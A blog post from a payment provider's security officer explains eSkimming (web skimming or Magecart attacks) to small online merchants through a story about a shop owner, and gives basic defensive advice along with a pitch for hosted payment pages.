Cybersecurity is often discussed in dramatic terms – large breaches, sophisticated attacks, headline-making incidents. In reality, many security failures begin much more quietly.
QuietChain is a new blog series written by James Lugton, Security Officer and Infrastructure specialist at Nochex – one of the UK’s first online payment service providers, recently acquired by PAYSTRAX. With over 5 years of hands-on experience in cybersecurity, James specialises in translating complex threats into everyday, relatable day-to-day situations people can actually recognise and act on.
The first post of the QuietChain series explores eSkimming: what it is, how it works, and why even well-run online businesses can fall victim to it. With the power of AI in the hands of bad actors and aging websites this eSkimming threat is becoming more frequent.
The Door Left Open
Most problems in life do not arrive with flashing lights. They slip in quietly, the way a draft moves through a room when a door has not been closed properly. You do not notice the moment until it happens, only the feeling that something is slightly off.
Websites behave the same way. They do not shout when they are getting old or warn you when a plugin has not been updated in months. They just keep going… until they STOP.
Sophie’s online shop was a perfect example of this. A small business she had built with care, a checkout that felt smooth, a routine she trusted. Then one morning, a message arrived from a customer: “My bank flagged a suspicious transaction after buying from your site.”
That is the kind of message that makes your stomach drop. Not because you have done something wrong, but because you genuinely do not know what has happened. There were no errors, no warnings, nothing broken – just one outdated plugin, a tiny thing she had not thought about in months. And that was enough.
Attackers had slipped in a few lines of hidden code. Nothing dramatic, nothing visible. Just a quiet watcher sitting inside her checkout, collecting every card number typed in. The purchases still went through normally, customers had no idea, and the code sat there waiting, invisible, for as long as it could.
That is eSkimming.
It is also known as web skimming, formjacking, or a Magecart attack. Different names for the same basic idea: attackers inject malicious JavaScript into a merchant’s payment page to capture payment details.
Sometimes the script runs quietly in the customer’s browser, copying card details as they are typed and sending them to a server the attacker controls, often without breaking the checkout at all. The purchase can still go through normally, and nothing looks suspicious until a customer’s bank flags fraudulent activity later.
In other cases, the injected code is more “hands-on”. It can place a fake card form on top of the real one, or replace the legitimate form entirely. The customer enters their details, hits submit, then sees a generic error message or “something went wrong” prompt, and gets redirected back to the real checkout flow to try again. From the customer’s perspective it feels like a normal website hiccup. From the attacker’s perspective, it’s a clean way to collect card details while the merchant still receives the order.
eSkimming does not smash the door down. It waits for the door you forgot to close.
Why does eSkimming happen?
Because life is busy, small businesses juggle everything – stock, customers, emails, suppliers, family, late nights, early mornings. Nobody wakes up thinking, “Today I will check every plugin, password, and access log.”
Websites age quietly, and attackers look for the quiet places. A missed update on a plugin or content management system creates a known vulnerability, and attackers actively scan for exactly those weaknesses. A reused password or a default admin account that was never changed gives them a way in. One small gap, left open long enough, is all it takes. And the worst part is that eSkimming attacks can go undetected for months. By that point, it may not only be card details that have been exposed, but also other sensitive customer data such as full names, email addresses and postal addresses. The impact can extend far beyond a single fraudulent transaction, affecting customer trust and long-term reputation.
What merchants are responsible for?
Even when a third-party payment provider handles card data on your behalf (which is exactly what reduces your PCI DSS scope to the lighter SAQ-A level), your own website environment still matters. Attackers do not need to reach your payment provider directly. They just need to compromise your website, and that is often enough for an eSkimming attack to be successful.
Security in this context is shared. A payment partner can reduce exposure and add layers of protection, but merchants are still responsible for maintaining their own environment.
In practice, this means:
✅ Keep your site, plugins and software updated – vulnerabilities in outdated code are one of the most common entry points for eSkimming attacks.
✅ Avoid default usernames and passwords on any web-facing system or admin panel.
✅ Know who has access to your site and remove accounts that are no longer needed.
✅ Check occasionally that nothing unusual has appeared in your site’s code or behaviour.
eSkimming thrives on the things that quietly slip off the to-do list. These are not highly technical tasks. They are digital housekeeping: the equivalent of locking up at night, checking the back door is closed, and not leaving the keys under the mat.
Where a PayFac / Payment Orchestration Platform helps
A good payments partner does not replace your own effort but it does strengthen it. Security works best when both sides actively do their part.
When your payment pages are hosted by your provider rather than sitting on your own site, card data never touches your environment in the first place. That is a meaningful reduction in eSkimming risk, not just a compliance convenience, because it means an attacker who finds their way into your site has nothing to skim.
Beyond that, a well-built platform can:
✅ Monitor for unusual transaction behaviour
✅ Flag suspicious patterns early
✅ Apply consistent fraud controls
✅ Enforce security standards across environments
This creates an additional safety layer that many small and mid-sized merchants would struggle to build alone. Think of it as having someone watching the back door while you focus on running the shop.
The quiet truth
Most breaches do not come from dramatic failures. They come from everyday moments: the things we forget, the updates we postpone, the habits we mean to fix but never quite get to.
Sophie’s story is not unusual; eSkimming is one of the most common forms of payment fraud targeting online merchants today. And the merchants it tends to catch are not the careless ones, on the contrary, they are the busy ones, the ones building something real, who simply did not know that one small gap was enough.
Security is not about being perfect. It is about being consistent.
Regular habits + strong partners = real protection.
In the next QuietChain series..
What happens when attackers come back for a second round, and why paying a ransom once puts a target on your back.
For other cybersecurity insights from James in the meantime, head over to his blog ‘Security e-drift: the quiet compromise‘
